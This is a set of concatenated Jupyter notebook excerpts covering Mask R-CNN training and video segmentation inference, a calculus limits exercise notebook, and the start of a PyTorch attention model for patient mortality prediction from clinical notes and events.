class_id = annotation['category_id']
mask = Image.new('1', (image_info['width'], image_info['height']))
mask_draw = ImageDraw.ImageDraw(mask, '1')
for segmentation in annotation['segmentation']:
mask_draw.polygon(segmentation, fill=1)
bool_array = np.array(mask) > 0
instance_masks.append(bool_array)
class_ids.append(class_id)
mask = np.dstack(instance_masks)
class_ids = np.array(class_ids, dtype=np.int32)
return mask, class_ids
###Output
_____no_output_____
###Markdown
Create the Training and Validation DatasetsMake sure you link to the correct locations for your training dataset in the cell below.
###Code
dataset_train = CocoLikeDataset()
dataset_train.load_data('/content/drive/My Drive/01022020/output_train/coco_instances.json',
'/content/drive/My Drive/01022020/output_train/images')
dataset_train.prepare()
dataset_val = CocoLikeDataset()
dataset_val.load_data('/content/drive/My Drive/01022020/output_val/coco_instances.json',
'/content/drive/My Drive/01022020/output_val/images')
dataset_val.prepare()
###Output
_____no_output_____
###Markdown
Display a few images from the train and val datasetsThis will just make sure everything is set up correctly
###Code
for name, dataset in [('training', dataset_train), ('validation', dataset_val)]:
print(f'Displaying examples from {name} dataset:')
image_ids = np.random.choice(dataset.image_ids, 3)
for image_id in image_ids:
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
visualize.display_top_masks(image, mask, class_ids, dataset.class_names)
###Output
Displaying examples from training dataset:
###Markdown
Create the Training Model and TrainThis code is largely borrowed from the train_shapes.ipynb notebook in the Matterport repo.
###Code
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "last" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last(), by_name=True)
###Output
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:190: The name tf.get_default_session is deprecated. Please use tf.compat.v1.get_default_session instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:197: The name tf.ConfigProto is deprecated. Please use tf.compat.v1.ConfigProto instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:203: The name tf.Session is deprecated. Please use tf.compat.v1.Session instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:207: The name tf.global_variables is deprecated. Please use tf.compat.v1.global_variables instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:216: The name tf.is_variable_initialized is deprecated. Please use tf.compat.v1.is_variable_initialized instead.
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/backend/tensorflow_backend.py:223: The name tf.variables_initializer is deprecated. Please use tf.compat.v1.variables_initializer instead.
Re-starting from epoch 62
###Markdown
TrainingTrain in two stages:1. Only the heads. Here we're freezing all the backbone layers and training only the randomly initialized layers (i.e. the ones that we didn't use pre-trained weights from MS COCO). To train only the head layers, pass layers='heads' to the train() function.2. Fine-tune all layers. For this simple example it's not necessary, but we're including it to show the process. Simply pass layers='all' to train all layers.
###Code
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
start_train = time.time()
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=60,
layers='heads')
end_train = time.time()
minutes = round((end_train - start_train) / 60, 2)
print(f'Training took {minutes} minutes')
# Fine tune all layers
# Passing layers="all" trains all layers. You can also
# pass a regular expression to select which layers to
# train by name pattern.
start_train = time.time()
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE / 10,
epochs=70,
layers="all")
end_train = time.time()
minutes = round((end_train - start_train) / 60, 2)
print(f'Training took {minutes} minutes')
###Output
Starting at epoch 62. LR=0.0001
Checkpoint Path: /content/drive/My Drive/Mask_RCNN-master/logs/cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_{epoch:04d}.h5
Selecting layers to train
conv1 (Conv2D)
bn_conv1 (BatchNorm)
res2a_branch2a (Conv2D)
bn2a_branch2a (BatchNorm)
res2a_branch2b (Conv2D)
bn2a_branch2b (BatchNorm)
res2a_branch2c (Conv2D)
res2a_branch1 (Conv2D)
bn2a_branch2c (BatchNorm)
bn2a_branch1 (BatchNorm)
res2b_branch2a (Conv2D)
bn2b_branch2a (BatchNorm)
res2b_branch2b (Conv2D)
bn2b_branch2b (BatchNorm)
res2b_branch2c (Conv2D)
bn2b_branch2c (BatchNorm)
res2c_branch2a (Conv2D)
bn2c_branch2a (BatchNorm)
res2c_branch2b (Conv2D)
bn2c_branch2b (BatchNorm)
res2c_branch2c (Conv2D)
bn2c_branch2c (BatchNorm)
res3a_branch2a (Conv2D)
bn3a_branch2a (BatchNorm)
res3a_branch2b (Conv2D)
bn3a_branch2b (BatchNorm)
res3a_branch2c (Conv2D)
res3a_branch1 (Conv2D)
bn3a_branch2c (BatchNorm)
bn3a_branch1 (BatchNorm)
res3b_branch2a (Conv2D)
bn3b_branch2a (BatchNorm)
res3b_branch2b (Conv2D)
bn3b_branch2b (BatchNorm)
res3b_branch2c (Conv2D)
bn3b_branch2c (BatchNorm)
res3c_branch2a (Conv2D)
bn3c_branch2a (BatchNorm)
res3c_branch2b (Conv2D)
bn3c_branch2b (BatchNorm)
res3c_branch2c (Conv2D)
bn3c_branch2c (BatchNorm)
res3d_branch2a (Conv2D)
bn3d_branch2a (BatchNorm)
res3d_branch2b (Conv2D)
bn3d_branch2b (BatchNorm)
res3d_branch2c (Conv2D)
bn3d_branch2c (BatchNorm)
res4a_branch2a (Conv2D)
bn4a_branch2a (BatchNorm)
res4a_branch2b (Conv2D)
bn4a_branch2b (BatchNorm)
res4a_branch2c (Conv2D)
res4a_branch1 (Conv2D)
bn4a_branch2c (BatchNorm)
bn4a_branch1 (BatchNorm)
res4b_branch2a (Conv2D)
bn4b_branch2a (BatchNorm)
res4b_branch2b (Conv2D)
bn4b_branch2b (BatchNorm)
res4b_branch2c (Conv2D)
bn4b_branch2c (BatchNorm)
res4c_branch2a (Conv2D)
bn4c_branch2a (BatchNorm)
res4c_branch2b (Conv2D)
bn4c_branch2b (BatchNorm)
res4c_branch2c (Conv2D)
bn4c_branch2c (BatchNorm)
res4d_branch2a (Conv2D)
bn4d_branch2a (BatchNorm)
res4d_branch2b (Conv2D)
bn4d_branch2b (BatchNorm)
res4d_branch2c (Conv2D)
bn4d_branch2c (BatchNorm)
res4e_branch2a (Conv2D)
bn4e_branch2a (BatchNorm)
res4e_branch2b (Conv2D)
bn4e_branch2b (BatchNorm)
res4e_branch2c (Conv2D)
bn4e_branch2c (BatchNorm)
res4f_branch2a (Conv2D)
bn4f_branch2a (BatchNorm)
res4f_branch2b (Conv2D)
bn4f_branch2b (BatchNorm)
res4f_branch2c (Conv2D)
bn4f_branch2c (BatchNorm)
res5a_branch2a (Conv2D)
bn5a_branch2a (BatchNorm)
res5a_branch2b (Conv2D)
bn5a_branch2b (BatchNorm)
res5a_branch2c (Conv2D)
res5a_branch1 (Conv2D)
bn5a_branch2c (BatchNorm)
bn5a_branch1 (BatchNorm)
res5b_branch2a (Conv2D)
bn5b_branch2a (BatchNorm)
res5b_branch2b (Conv2D)
bn5b_branch2b (BatchNorm)
res5b_branch2c (Conv2D)
bn5b_branch2c (BatchNorm)
res5c_branch2a (Conv2D)
bn5c_branch2a (BatchNorm)
res5c_branch2b (Conv2D)
bn5c_branch2b (BatchNorm)
res5c_branch2c (Conv2D)
bn5c_branch2c (BatchNorm)
fpn_c5p5 (Conv2D)
fpn_c4p4 (Conv2D)
fpn_c3p3 (Conv2D)
fpn_c2p2 (Conv2D)
fpn_p5 (Conv2D)
fpn_p2 (Conv2D)
fpn_p3 (Conv2D)
fpn_p4 (Conv2D)
In model: rpn_model
rpn_conv_shared (Conv2D)
rpn_class_raw (Conv2D)
rpn_bbox_pred (Conv2D)
mrcnn_mask_conv1 (TimeDistributed)
mrcnn_mask_bn1 (TimeDistributed)
mrcnn_mask_conv2 (TimeDistributed)
mrcnn_mask_bn2 (TimeDistributed)
mrcnn_class_conv1 (TimeDistributed)
mrcnn_class_bn1 (TimeDistributed)
mrcnn_mask_conv3 (TimeDistributed)
mrcnn_mask_bn3 (TimeDistributed)
mrcnn_class_conv2 (TimeDistributed)
mrcnn_class_bn2 (TimeDistributed)
mrcnn_mask_conv4 (TimeDistributed)
mrcnn_mask_bn4 (TimeDistributed)
mrcnn_bbox_fc (TimeDistributed)
mrcnn_mask_deconv (TimeDistributed)
mrcnn_class_logits (TimeDistributed)
mrcnn_mask (TimeDistributed)
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/optimizers.py:793: The name tf.train.Optimizer is deprecated. Please use tf.compat.v1.train.Optimizer instead.
###Markdown
Prepare to run InferenceCreate a new InferenceConfig, then use it to create a new model.
###Code
class InferenceConfig(CocoSynthConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
DETECTION_MIN_CONFIDENCE = 0.01
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
###Output
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:720: The name tf.sets.set_intersection is deprecated. Please use tf.sets.intersection instead.
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:722: The name tf.sparse_tensor_to_dense is deprecated. Please use tf.sparse.to_dense instead.
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:772: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use `tf.cast` instead.
###Markdown
Load Trained WeightsNote: The code is set to find_last() by default, but you can also point the model to a specific pretrained weights file if you use line 3 instead of line 4.
###Code
# Get path to saved weights
# Either set a specific path or find last trained weights
#model_path = str(Path(ROOT_DIR) / "logs" / "cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_0039.h5" )
model_path = model.find_last()
# Load trained weights (fill in path to trained weights here)
assert model_path != "", "Provide path to trained weights"
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
###Output
Loading weights from /content/drive/My Drive/Mask_RCNN-master/logs/cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_0070.h5
Re-starting from epoch 70
###Markdown
Image InferenceRun model.detect() on real images.We get some false positives, and some misses. More training images are likely needed to improve the results.You can adjust the "figsize" in the cell below to make the image larger or smaller.
###Code
import skimage
#real_test_dir = '/content/drive/My Drive/29012020/output_1class_cracks/output_cracks/val/images'
real_test_dir = '/content/drive/My Drive/Mask_RCNN-master/test_data/ext'
image_paths = []
for filename in os.listdir(real_test_dir):
if os.path.splitext(filename)[1].lower() in ['.png', '.jpg', '.jpeg']:
image_paths.append(os.path.join(real_test_dir, filename))
for image_path in image_paths:
img = skimage.io.imread(image_path)
img_arr = np.array(img)
results = model.detect([img_arr], verbose=1)
r = results[0]
n_instances = r['rois'].shape[0]
visualize.display_instances(img, r['rois'], r['masks'], r['class_ids'],
dataset_train.class_names, r['scores'], (0,255,128), figsize=(8,8))
visualize.display_weight_stats(model)
###Output
_____no_output_____
###Markdown
Video Inference Prepare to run Video InferenceNote: This code is adapted from https://www.dlology.com/blog/how-to-run-object-detection-and-segmentation-on-video-fast-for-free/ created by Chengwei Zhang.In this section, we'll open up a video, run inference on it, and output a new video with segmentations and labels.
###Code
video_file = Path("../datasets/box_dataset_synthetic/videotest/boxvideo_24fps.mp4")
video_save_dir = Path("../datasets/box_dataset_synthetic/videotest/save")
video_save_dir.mkdir(exist_ok=True)
###Output
_____no_output_____
###Markdown
Adjust Config ParametersDepending on the resolution of your video, you may want to update the parameters below.Mask R-CNN requires IMAGE_MIN_DIM to be divisible by 2 six times (i.e. by 64), so that's why I'm using 1088 instead of 1080, which is the actual height of the video.
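A quick added check of that divisibility requirement (divisible by 2 six times means divisible by $2^6 = 64$):

```python
# 1088 is divisible by 64; the original 1080 frame height is not.
print(1088 % 64, 1080 % 64)  # -> 0 56
```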
###Code
class VideoInferenceConfig(CocoSynthConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 1088
IMAGE_MAX_DIM = 1920
IMAGE_SHAPE = [1920, 1080, 3]
DETECTION_MIN_CONFIDENCE = 0.80
inference_config = VideoInferenceConfig()
###Output
_____no_output_____
###Markdown
Set Up Model and Load Trained Weights
###Code
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
# model_path = str(Path(ROOT_DIR) / "logs" / "box_synthetic20190328T2255/mask_rcnn_box_synthetic_0016.h5" )
model_path = model.find_last()
# Load trained weights (fill in path to trained weights here)
assert model_path != "", "Provide path to trained weights"
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
import cv2
import skimage
import random
import colorsys
from tqdm import tqdm
def random_colors(N, bright=True):
""" Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
Args:
N: the number of colors to generate
bright: whether or not to use bright colors
Returns:
a list of RGB colors, e.g [(0.0, 1.0, 0.0), (1.0, 0.0, 0.5), ...]
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def apply_mask(image, mask, color, alpha=0.5):
""" Apply the given mask to the image.
Args:
image: a cv2 image
mask: a mask of which pixels to color
color: the color to use
alpha: how visible the mask should be (0 to 1)
Returns:
a cv2 image with mask applied
"""
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
def display_instances(image, boxes, masks, ids, names, scores, colors):
""" Take the image and results and apply the mask, box, and label
Args:
image: a cv2 image
boxes: a list of bounding boxes to display
masks: a list of masks to display
ids: a list of class ids
names: a list of class names corresponding to the ids
scores: a list of scores of each instance detected
colors: a list of colors to use
Returns:
a cv2 image with instances displayed
"""
n_instances = boxes.shape[0]
if not n_instances:
return image # no instances
else:
assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]
for i, color in enumerate(colors):
# Check if any boxes to show
if not np.any(boxes[i]):
continue
# Check if any scores to show
if scores is not None:
score = scores[i]
else:
score = None
# Add the mask
image = apply_mask(image, masks[:, :, i], color)
# Add the bounding box
y1, x1, y2, x2 = boxes[i]
image = cv2.rectangle(image, (x1, y1), (x2, y2), color, 2)
# Add the label
label = names[ids[i]]
if score:
label = f'{label} {score:.2f}'
label_pos = (x1 + (x2 - x1) // 2, y1 + (y2 - y1) // 2) # center of bounding box
image = cv2.putText(image, label, label_pos, cv2.FONT_HERSHEY_DUPLEX, 0.7, color, 2)
return image
###Output
_____no_output_____
###Markdown
Prepare for InferenceAdjust the paths below to point to your video
###Code
video_file = Path("../datasets/box_dataset_synthetic/videotest/boxvideo_24fps.mp4")
video_save_dir = Path("../datasets/box_dataset_synthetic/videotest/save")
video_save_dir.mkdir(exist_ok=True)
vid_name = video_save_dir / "output.mp4"
v_format="FMP4"
fourcc = cv2.VideoWriter_fourcc(*v_format)
print('Writing output video to: ' + str(vid_name))
###Output
Writing output video to: ..\datasets\box_dataset_synthetic\videotest\save\output.mp4
###Markdown
Random colors can be a bit intense with video, so I've set it to use the same color for each object. You can try random colors if you like.Note: cv2 uses BGR (Blue Green Red) color representation instead of RGB (Red Green Blue), so we have to do a couple conversions here
###Code
#colors = random_colors(30)
colors = [(1.0, 1.0, 0.0)] * 30
# Change color representation from RGB to BGR before displaying instances
colors = [(color[2], color[1], color[0]) for color in colors]
###Output
_____no_output_____
###Markdown
Perform Inference on VideoUse the cv2 module to open the video and perform inference on each frame.
###Code
input_video = cv2.VideoCapture(str(video_file))
frame_count = int(input_video.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(input_video.get(cv2.CAP_PROP_FPS))
output_video = None
vid_size = None
current_frame = 0
for i in tqdm(range(frame_count)):
# Read the current frame
ret, frame = input_video.read()
if not ret:
break
current_frame += 1
# Change color representation from BGR to RGB before running model.detect()
detect_frame = frame[:, :, ::-1]
# Run inference on the color-adjusted frame
results = model.detect([detect_frame], verbose=0)
r = results[0]
n_instances = r['rois'].shape[0]
# Make sure we have enough colors
if len(colors) < n_instances:
# not enough colors, generate more
more_colors = random_colors(n_instances - len(colors))
# Change color representation from RGB to BGR before displaying instances
more_colors = [(color[2], color[1], color[0]) for color in more_colors]
colors += more_colors
# Display instances on the original frame
display_frame = display_instances(frame, r['rois'], r['masks'], r['class_ids'],
dataset_train.class_names, r['scores'], colors[0:n_instances])
# Make sure we got displayed instances
if display_frame is not None:
frame = display_frame
# Create the output_video if it doesn't yet exist
if output_video is None:
if vid_size is None:
vid_size = frame.shape[1], frame.shape[0]
output_video = cv2.VideoWriter(str(vid_name), fourcc, float(fps), vid_size, True)
# Resize frame if necessary
if vid_size[0] != frame.shape[1] and vid_size[1] != frame.shape[0]:
frame = cv2.resize(frame, vid_size)
# Write the frame to the output_video
output_video.write(frame)
input_video.release()
output_video.release()
###Output
_____no_output_____ |
nb_Limits/limits_nb_TIY2.ipynb | ###Markdown
Computational Examples: Limits
###Code
# The following line will initialize the notebook by loading some libraries necessary to run the code below
%run limits_def.py
###Output
_____no_output_____
###Markdown
Estimating limits using a table Choose a function $f$ and a number $r$.
###Code
f = function('x^3-3x+5')
r = 1.3
show_limit_analysis(f,r)
###Output
_____no_output_____
###Markdown
Confirm estimate You can confirm your estimate by running the cell below. This will compute the limit formally.
###Code
limit(f,r)
###Output
_____no_output_____
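If you want an independent check that does not rely on the helpers loaded from `limits_def.py`, here is an added sketch using `sympy` (an assumption: `sympy` is not imported by this notebook); the same pattern also works for the exercises suggested below:

```python
# Added sketch: check the limit of f(x) = x^3 - 3x + 5 as x -> 1.3 with sympy.
import sympy as sp

x = sp.symbols('x')
print(sp.limit(x**3 - 3*x + 5, x, sp.Rational(13, 10)))  # 3.297 = 1.3^3 - 3*1.3 + 5
```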
###Markdown
Try it yourself! Repeat the above analysis for different values of $r$ and other choices of $f$.For example, try- $f(x) = 2^x+x^2-1$, $r = 0.5$- $f(x) = \dfrac{1-x}{1+x^2}$, $r = -1.8$ Estimating limits by evaluating a function Next, we generate a random function $g(x)$ and pick a number $s$:
###Code
g = generate_random_function()
###Output
_____no_output_____
###Markdown
In this example, we will not know the function $g(x)$ explicitly, but we can evaluate $g$ for specific $x$, such as:
###Code
g(3)
###Output
_____no_output_____
###Markdown
Use the evaluation cells to compute values $g(x)$ for $x$ approaching $s$ from the right:
###Code
g(2.1)
g(2.201)
g(2.200001)
g(2.200000001)
###Output
_____no_output_____
###Markdown
It looks like `13.25` is a good estimate for the limit. Let's confirm this.
###Code
limit(g,s)
###Output
_____no_output_____
###Markdown
Note that in this case, we cannot simply evaluate $g$ at $x=2.2$ to obtain the limit:
###Code
g(2.2)
###Output
_____no_output_____
###Markdown
Now try this again with different $g$ and $s$. Activate the `Live Code` option and run the cell `g = generate_random_function()` above to generate new $g,s$.
###Code
g,s = generate_example()
###Output
_____no_output_____
###Markdown
We first compute a table with values of $g(x)$ for numbers $x$ close, *but not equal to*, $s$:
###Code
show_table(g, [s-0.1, s-0.01, s-0.001, s+0.001, s+0.01, s+0.1])
###Output
_____no_output_____
###Markdown
It certainly appears that the left-hand limit is not equal to the right-hand limit.For further detail, we can evaluate $g$ at additional inputs:
###Code
g(s-0.0000001)
g(s+0.0000001)
###Output
_____no_output_____
###Markdown
These values should give us a good estimate of the limits. Let's confirm this by computing the limit formally:
###Code
lim_left(g,s)
lim_right(g,s)
###Output
_____no_output_____ |
events_network.ipynb | ###Markdown
Events NetworkThis notebook runs the Events Network by itself, to validate the contribution of the Network when we train and test based on this network alone. Import Libraries
###Code
from __future__ import print_function
import numpy as np
import string
import datetime
import pandas as pd
import matplotlib.pyplot as plt
import os
import torch
import torch.nn as nn
import time
import pickle
import random
import math
from torch.utils.data import Dataset
from torch.utils.data.dataset import random_split
from torch.utils.data import DataLoader, Subset
from sklearn.metrics import precision_recall_fscore_support, roc_auc_score
###Output
_____no_output_____
###Markdown
Initialization
###Code
#
seed = 230729
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
max_code = pickle.load(open('events_maxcode.p', 'rb')) + 1
assert max_code==127, "EVENTS MAX CODE changed?"
###Output
_____no_output_____
###Markdown
We know that not all patients have the same number of visit dates; therefore, we need to find the maximum number of visit dates for any given patient.
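The value below was precomputed; as an added sketch (assuming `index_1` indexes the visit dimension of the notes tensor, as in `create_dataset()` further down), it could be checked from the same files loaded by `load_notes_dataset_object()`:

```python
# Added sketch: the largest visit index used in the notes sparse tensor,
# plus one, must not exceed patients_max_visits.
import numpy as np

index_1 = np.load('orig_index_1.npy', allow_pickle=True)
print(index_1.max() + 1)
```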
###Code
patients_max_visits = 505
###Output
_____no_output_____
###Markdown
In preparation for running the model training on CUDA, we need to make sure that we have a CUDA device available and load the tensors and the model onto it.
###Code
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
###Output
Using device: cuda
NVIDIA GeForce GTX 1060 6GB
Memory Usage:
Allocated: 0.0 GB
Cached: 0.0 GB
###Markdown
Loading data from filesThese files were generated from SQL queries contained in notes_extraction.ipynb and events_extraction.ipynb notebooks.
###Code
def load_events_dataset_object(prefix=''):
return pickle.load( open(prefix + "events_item.p", "rb" )), pickle.load(open(prefix + "events_value.p", "rb"))
###Output
_____no_output_____
###Markdown
Dataset Definition
###Code
def load_notes_dataset_object(prefix = ''):
patient_subject_id = np.load(prefix + 'subject_id.npy', allow_pickle=True).tolist()
patients_notes_fetures = np.load(prefix + 'patients_notes_fetures.npy', allow_pickle=True)
index_0 = np.load(prefix + 'index_0.npy', allow_pickle=True)
index_1 = np.load(prefix + 'index_1.npy', allow_pickle=True)
patient_mortality = np.load(prefix + 'patient_mortality.npy', allow_pickle=True)
return patient_subject_id, patients_notes_fetures, index_0, index_1, patient_mortality
class NotesEventsDataset(Dataset):
def __init__(self, patient_id, patients_notes, notes_mask, events_items, events_values, mortality):
self.patient_id = patient_id
len_events_patients = len(events_items['subject_id'].unique())
self.x = patients_notes.to(device, non_blocking=True)
self.notes_mask = notes_mask.to(device, non_blocking=True)
self.y = mortality.to(device, non_blocking=True)
self.items = events_items.groupby('subject_id').agg('codes').apply(list).values
self.values = events_values.groupby('subject_id').agg('values').apply(list).values
assert len(self.x) == len_events_patients, 'Notes patients and events patients counts do not match!'
r = random.randrange(len(self.x))
assert events_items['subject_id'].unique()[r] == self.patient_id[r], 'Notes and events patient id=' + str(r) + ' does not match'
def __len__(self):
return len(self.x)
def __getitem__(self, index):
events = np.zeros([len(self.items[index]), max_code])
for i, codes in enumerate(self.items[index]):
for j, code in enumerate(codes):
v = self.values[index][i][j]
events[i, code] = v if not math.isnan(v) else 0.0
return(self.x[index].to_dense(), self.notes_mask[index].to_dense(), events, self.y[index])
def create_dataset (cohort_type = 'original'):
"""
cohort_type = 'original' -> Unbalanced cohort will be created
cohort_type = 'essential' -> Unbalanced cohort with just the minimum set of events features
cohort_type = 'balanced_train' -> Balanced cohort for training will be created
cohort_type = 'balanced_test' -> Balanced cohort for testing will be created
"""
notes_prefix = "orig_" if cohort_type in ['original','essential'] else "train_" if cohort_type == 'balanced_train' else "test_"
subject_id, patients_notes_fetures, index_0, index_1, patient_mortality= load_notes_dataset_object(prefix = notes_prefix)
index = [index_0, index_1]
patients_notes_fetures = torch.sparse_coo_tensor(index, patients_notes_fetures, (len(subject_id),patients_max_visits,200), dtype = torch.float)
ones = np.ones((len(index_0),200))
notes_mask = torch.sparse_coo_tensor(index, ones, (len(subject_id),patients_max_visits,200), dtype = torch.float)
patient_mortality = torch.from_numpy(patient_mortality).float()
events_prefix = "" if cohort_type=='original' else cohort_type +"_"
events_items, events_values = load_events_dataset_object(events_prefix)
assert len(events_items)==len(events_values) and len(events_values['subject_id'].unique()) == len(events_items['subject_id'].unique()) == len(patient_mortality) , "Wrong events dataframes?"
dataset = NotesEventsDataset(subject_id, patients_notes_fetures, notes_mask, events_items, events_values, patient_mortality)
assert len(patient_mortality) == len(dataset), 'Wrong dataset length!'
print ("Number of Patients:", len(patient_mortality))
return dataset
###Output
_____no_output_____
###Markdown
Dataloaders Definition
###Code
batch_size = 50
def collate_fn(data):
x, notes_mask, events, mortality_flag = zip(*data)
maxvisits = max([len(p) for p in events])
events_result = torch.tensor([np.concatenate((p, np.zeros([maxvisits - len(p), max_code]))) for p in events]).float()
events_mask = torch.tensor([np.concatenate((np.ones(len(p)), np.zeros(maxvisits - len(p)))) for p in events]).int()
x = torch.stack(x)
notes_mask = torch.stack(notes_mask)
mortality_flag = torch.stack(mortality_flag)
events_result = events_result.to(device, non_blocking=True)
events_mask = events_mask.to(device, non_blocking=True)
return x, notes_mask, events_result, events_mask, mortality_flag
###Output
_____no_output_____
###Markdown
Dataloader for the unbalanced (original) cohort.
###Code
def get_unbalanced_dataloaders (max_size = 0):
dataset = create_dataset('original')
if (max_size > 0):
print ("***** Slicing to " + str(max_size))
dataset = Subset(dataset, np.arange(max_size))
split = int(len(dataset)*0.8)
lengths = [split, len(dataset) - split]
train_dataset, val_dataset = random_split(dataset, lengths)
train_loader = DataLoader(train_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=False)
return train_loader, val_loader
###Output
_____no_output_____
###Markdown
Dataloader for the balanced cohort (data up-sampling of "dead" patients to eliminate class imbalance).
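The balanced files themselves are produced in the extraction notebooks; purely as an illustration of the up-sampling idea, here is an added sketch using `sklearn` (the dataframe and the `mortality` column here are hypothetical):

```python
# Hypothetical sketch of balancing by up-sampling the minority ("dead") class.
import pandas as pd
from sklearn.utils import resample

def upsample(df: pd.DataFrame, label_col: str = 'mortality') -> pd.DataFrame:
    majority = df[df[label_col] == 0]
    minority = df[df[label_col] == 1]
    minority_up = resample(minority, replace=True, n_samples=len(majority), random_state=seed)
    # shuffle so the duplicated minority rows are not grouped together
    return pd.concat([majority, minority_up]).sample(frac=1, random_state=seed)
```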
###Code
def get_balanced_dataloaders (max_size = 0):
print ("* Train dataset *")
balanced_train_dataset = create_dataset('balanced_train')
print ("* Test dataset *")
balanced_test_dataset = create_dataset('balanced_test')
if (max_size > 0):
print ("***** Slicing to " + str(max_size))
balanced_train_dataset = Subset(balanced_train_dataset, np.arange(max_size))
balanced_test_dataset = Subset(balanced_test_dataset, np.arange(max_size))
train_loader = DataLoader(balanced_train_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=True)
val_loader = DataLoader(balanced_test_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=False)
return train_loader, val_loader
###Output
_____no_output_____
###Markdown
Model Definition Alpha Attention
###Code
class AlphaAttention(torch.nn.Module):
"""
Alpha attention mechanism to compute the attention weights corresponding to each date with events data.
"""
def __init__(self, hidden_dim):
super().__init__()
"""
Arguments:
hidden_dim: the hidden layer dimension
"""
self.a_att = nn.Linear(hidden_dim, 1)
def forward(self, g):
"""
Arguments:
g: the output tensor from RNN-alpha of shape (batch_size, seq_length, hidden_dim)
Outputs:
alpha: the corresponding attention weights of shape (batch_size, seq_length, 1)
"""
return torch.softmax(self.a_att(g), dim=1)
###Output
_____no_output_____
###Markdown
Beta Attention
###Code
class BetaAttention(torch.nn.Module):
"""
Beta attention mechanism to compute the attention weights corresponding to each event code.
"""
def __init__(self, input_dim, emb_dim):
super().__init__()
"""
Arguments:
input_dim: the hidden layer dimension
emb_dim: the number of events codes
"""
self.b_att = nn.Linear(input_dim, emb_dim)
def forward(self, h):
"""
Arguments:
h: the output tensor from RNN-beta of shape (batch_size, seq_length, input_dim)
Outputs:
beta: the corresponding attention weights of shape (batch_size, seq_length, # of events codes)
"""
return torch.tanh(self.b_att(h))
###Output
_____no_output_____
###Markdown
Events Network
###Code
class EventsRNN(nn.Module):
def attention_sum(self, alpha, beta, x, masks):
"""
Performs the weighted sum of the events data using alpha and beta attention weights.
It also sets to 0 the positions corresponding to dates without events data using the masks information.
Arguments:
alpha: the alpha attention weights of shape (batch_size, seq_length, 1)
beta: the beta attention weights of shape (batch_size, seq_length, hidden_dim)
x: the events data for each date with shape (batch_size, # of dates, # of events codes)
masks: the padding masks in time of shape (batch_size, # of dates, # of events codes)
Outputs:
c: the context vector of shape (batch_size, hidden_dim)
"""
masks = masks.unsqueeze(-1)
return torch.sum( beta * x * alpha * masks , dim=1 )
def __init__(self, num_codes, emb_size=128):
super().__init__()
# Define the RNN-alpha using `nn.GRU()`
self.rnn_a = nn.GRU(num_codes, 128, batch_first=True)
# Define the RNN-beta using `nn.GRU()`
self.rnn_b = nn.GRU(num_codes, 128, batch_first=True)
# Define the alpha-attention using `AlphaAttention()`
self.att_a = AlphaAttention(128)
# Define the beta-attention using `BetaAttention()`
self.att_b = BetaAttention(128, num_codes)
